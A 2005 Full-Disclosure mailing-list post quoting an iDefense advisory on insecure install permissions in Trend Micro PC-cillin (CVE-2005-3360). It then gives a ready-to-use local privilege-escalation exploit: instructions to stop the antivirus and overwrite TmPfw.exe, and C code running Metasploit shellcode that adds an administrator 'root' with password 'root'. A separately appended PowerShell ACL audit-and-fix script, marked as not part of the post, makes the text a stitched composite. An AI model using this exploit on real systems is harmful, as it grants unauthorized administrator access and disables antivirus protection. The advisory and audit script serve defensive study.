Message-ID: <43B11FC3.4090205@fh-hagenberg.at>
Date: Tue Dec 27 16:51:55 2005
From: gerhard.wagner at fh-hagenberg.at (Gerhard Wagner)
Subject: iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability
labs-no-reply@...fense.com wrote:
>
> Trend Micro PC-Cillin Internet Security Insecure File Permission
> Vulnerability
>
> iDefense Security Advisory 12.14.05
> www.idefense.com/application/poi/display?id=351&type=vulnerabilities
> December 14, 2005
>
> I. BACKGROUND
>
> Trend Micro PC-Cillin Internet Security is antivirus protection software
> for home and business use. It provides complete protection, detection
> and elimination of thousands of computer viruses, worms, and Trojan
> Horse programs.
>
> II. DESCRIPTION
>
> Local exploitation of an insecure permission vulnerability in multiple
> Trend Micro Inc. products allows attackers to escalate privileges or
> disable protection.
>
> The vulnerabilities specifically exist in the default Access Control
> List (ACL) settings that are applied during installation. When an
> administrator installs an affected Trend Micro product, the default ACL
> allows any user to modify the installed files. Due to the fact that some
> of the programs run as system services, a user could replace an
> installed Trend Micro product file with their own malicious code, and
> the code would be executed with system privileges.
>
> III. ANALYSIS
>
> Successful exploitation allows local attackers to escalate privileges to
> the system level. It is also possible to use this vulnerability to
> simply disable protection by moving all of the executable files so that
> they cannot start upon a reboot. Once disabled, the products are no
> longer able to provide threat mitigation, thus opening the machine up to
> attack.
>
> IV. DETECTION
>
> iDefense has confirmed the existence of this vulnerability in Trend
> Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
> suspected that previous versions are also vulnerable. It has been
> reported that InterScan VirusWall, InterScan eManager and Office Scan
> are also vulnerable.
>
> V. WORKAROUND
>
> Apply proper Access Control List settings to the directory that the
> affected Trend Micro product is installed in. The ACL rules should be set
> so that no regular users can modify files in the directory.
>
> VI. VENDOR RESPONSE
>
> "Trend Micro has become aware of a vulnerability related to PC-CILLIN
> 12. PC-cillin12 does not work correctly when the configuration file and
> the registry are erased intentionally.
>
> We will release PC-cillin12.4 on December 14, 2005 by AU server. This
> release will include a short term solution of changing the ACL to User
> authority for the configuration file and registry.
>
> And
>
> We will create a tool for changing the ACL to User authority for the
> configuration file and registry.
>
> This tool can be used for both PC-cillin12 and PC-cillin14 as the same
> program."
>
> VII. CVE INFORMATION
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2005-3360 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org), which standardizes names for
> security problems.
>
> VIII. DISCLOSURE TIMELINE
>
> 10/27/2005 Initial vendor notification
> 10/27/2005 Initial vendor response
> 12/14/2005 Public disclosure
>
> IX. CREDIT
>
> The discoverer of this vulnerability wishes to remain anonymous.
>
> Get paid for vulnerability research
> http://www.iDefense.com/poi/teams/vcp.jsp
>
> X. LEGAL NOTICES
>
> Copyright © 2005 iDefense, Inc.
>
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without the express
> written consent of iDefense. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically, please
> email customerservice@...fense.com for permission.
>
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
/*
* by Team W00dp3ck3r:
* frauk\x41iser, mag00n and s00n
*
* Advisory: www.idefense.com/application/poi/display?id=351&type=vulnerabilities
* Tested on Windows XP Service Pack 2 english
* Version affected PC-cillin Internet Security 2006
*
* Status: currently no patch has been provided (19.12.2005)
*
* Follow the instructions to gain administrative privileges:
*
*
* 1.) Default Installation (can only be accomplished as Administrator).
* 2.) Log in as a restricted user.
* 3.) Compile the c code provided at the bottom of this document.
* 4.) Right click on the Trend Micro icon in the taskbar and shut down Trend Micro
* (Seems that Trend has forgotten that normal users should not be able to
* shut down an antivirus service).
* 5.) Fire up your favorite editor and open the previously compiled exe (we recommend
* UltraEdit) and also open TmPfw.exe which is located in the default installation
* directory of your Trend Micro installation.
* 6.) First copy the content of the TmPfw.exe into a blank document and save it.
* We will need it later, when we want to repair the service.
* 7.) Now replace the content of the TmPfw.exe file with the content of the self
* compiled executable.
*
* Note: It is really important to alter the content of the TmPfw.exe file. If you
* just change the filename of the created executable and then replace the
* file, the initial rights which are set during the installation would be lost.
* The TmPfw.exe file is executed with SYSTEM rights during startup process of
* Windows and it's under our control, because Trend Micro really messed up with
* the permissions.
*
* 8.) Restart the pccmain.exe and if you type net user in your command shell you will
* notice a user with administrative rights called root.
* 9.) Finally open the editor again and restore the content of the TmPfw.exe. Now
* Trend Micro works again without complaining.
*
*/
#include "windows.h"
/* win32_adduser - PASS=root EXITFUNC=thread USER=root Size=232
* Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x29\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x72"
"\x66\xf2\xa7\x83\xeb\xfc\xe2\xf4\x8e\x8e\xb6\xa7\x72\x66\x79\xe2"
"\x4e\xed\x8e\xa2\x0a\x67\x1d\x2c\x3d\x7e\x79\xf8\x52\x67\x19\xee"
"\xf9\x52\x79\xa6\x9c\x57\x32\x3e\xde\xe2\x32\xd3\x75\xa7\x38\xaa"
"\x73\xa4\x19\x53\x49\x32\xd6\xa3\x07\x83\x79\xf8\x56\x67\x19\xc1"
"\xf9\x6a\xb9\x2c\x2d\x7a\xf3\x4c\xf9\x7a\x79\xa6\x99\xef\xae\x83"
"\x76\xa5\xc3\x67\x16\xed\xb2\x97\xf7\xa6\x8a\xab\xf9\x26\xfe\x2c"
"\x02\x7a\x5f\x2c\x1a\x6e\x19\xae\xf9\xe6\x42\xa7\x72\x66\x79\xcf"
"\x4e\x39\xc3\x51\x12\x30\x7b\x5f\xf1\xa6\x89\xf7\x1a\x89\x3c\x47"
"\x12\x0e\x6a\x59\xf8\x68\xa5\x58\x95\x05\x9f\xc3\x5c\x03\x8a\xc2"
"\x52\x49\x91\x87\x1c\x03\x86\x87\x07\x15\x97\xd5\x52\x14\x9d\xc8"
"\x06\x46\x80\xc8\x1d\x12\xd2\x88\x33\x22\xb6\x87\x54\x40\xd2\xc9"
"\x17\x12\xd2\xcb\x1d\x05\x93\xcb\x15\x14\x9d\xd2\x02\x46\xb3\xc3"
"\x1f\x0f\x9c\xce\x01\x12\x80\xc6\x06\x09\x80\xd4\x52\x14\x9d\xc8"
"\x06\x46\xdd\xe6\x36\x22\xf2\xa7";
void (*opcode)();
void main(){
opcode= &shellcode;
opcode();
}
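As an added defensive example, not part of this post or of the iDefense advisory: a PowerShell audit for the condition sections II and V describe, an install directory whose ACL lets ordinary users modify files that later run as SYSTEM. The install path and the list of low-privilege principals are assumptions; the script only reports by default and rewrites the top-level ACL only when run with -Fix.

```powershell
param(
    # Assumption: the advisory does not name the install path; adjust to the real one.
    [string]$Path = 'C:\Program Files\Trend Micro',
    [switch]$Fix   # without -Fix the script only reports
)

# Principals that a restricted (non-admin) user is a member of (assumed list).
$lowPrivPrincipals = @('BUILTIN\Users', 'Everyone',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that let a caller replace or delete a file: explicit write/delete bits
# plus the generic access bits Windows may leave unmapped in an ACE.
$R = [System.Security.AccessControl.FileSystemRights]
$writeBits = [int]($R::Write -bor $R::Delete -bor $R::DeleteSubdirectoriesAndFiles -bor
                   $R::ChangePermissions -bor $R::TakeOwnership)
$writeBits = $writeBits -bor 0x10000000 -bor 0x40000000   # GENERIC_ALL, GENERIC_WRITE

function Find-WeakAce {
    param([string]$Target)
    $acl = Get-Acl -LiteralPath $Target
    foreach ($ace in $acl.Access) {
        $isLow = $lowPrivPrincipals -contains $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $isLow -and
            (([int]$ace.FileSystemRights) -band $writeBits)) {
            [pscustomobject]@{ Path = $Target; Identity = $ace.IdentityReference.Value
                               Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
        }
    }
}

# Audit the directory itself and everything below it (the service binaries live here).
$targets = @($Path) + (Get-ChildItem -LiteralPath $Path -Recurse -Force | ForEach-Object FullName)
$findings = foreach ($t in $targets) { Find-WeakAce -Target $t }
$findings | Format-Table -AutoSize

if ($Fix -and $findings) {
    # Remediation as section V describes: stop inheriting, drop the weak Allow ACEs
    # and leave Users with read/execute only. Children that carry their own explicit
    # weak ACEs (reported above with Inherited = False) need the same treatment.
    $acl = Get-Acl -LiteralPath $Path
    $acl.SetAccessRuleProtection($true, $true)    # copy inherited ACEs, then stop inheriting
    Set-Acl -LiteralPath $Path -AclObject $acl
    $acl = Get-Acl -LiteralPath $Path             # re-read: copied ACEs are now explicit
    foreach ($ace in @($acl.Access)) {
        if ($lowPrivPrincipals -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights) -band $writeBits)) { $null = $acl.RemoveAccessRule($ace) }
    }
    $acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule(
        'BUILTIN\Users', 'ReadAndExecute', 'ContainerInherit,ObjectInherit', 'None', 'Allow')))
    Set-Acl -LiteralPath $Path -AclObject $acl
}
```

Run it from an elevated prompt; a clean result is an empty table, and any row whose Identity is a low-privilege group is exactly the condition the advisory's section II describes.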